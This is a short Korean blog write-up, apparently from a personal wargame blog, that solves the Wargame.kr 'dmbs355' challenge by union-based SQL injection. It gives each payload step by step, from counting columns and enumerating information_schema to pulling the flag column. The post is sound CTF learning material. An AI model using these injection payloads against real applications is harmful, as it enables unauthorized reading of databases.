[Wargame.kr] dmbs355

뭔가 코드가 잘 이해가 가지 않았는데 결론적으로 그냥 인자로 search_cols에 이상한거를 보내고 query_parts에 원하는 쿼리를 보내면 "select * from board where $query_parts or order by idx desc"가 실행됩니다.

 

1 order by 5 -- 으로 보내보면 아무것도 보이지 않고 4 이전에는 보이니 4개임을 알 수 있습니다.

 

1 union select 1,2,3,4 -- 으로 보내보면 각 위치를 알 수 있습니다.

1 union select table_name,2,3,4 from information_schema.tables -- 로 보내보면 Th1s_1s_Flag_tbl이라는 테이블이 있습니다.

그리고 1 union select column_name,table_name,3,4 from information_schema.columns -- 으로 각 테이블의 column을 다 뒤져보면 

f1ag를 보고싶네요.

 

1 union select f1ag,2,3,4 from Th1s_1s_Flag_tbl -- 을 보내면 끝입니다. 

'워게임 > Wargame.kr' 카테고리의 다른 글

[Wargame.kr] QnA  (0) 2019.04.03
[Wargame.kr] ip log table  (0) 2019.04.02
[Wargame.kr] SimpleBoard  (0) 2019.04.02
[Wargame.kr] web chatting  (0) 2019.03.29
  Comments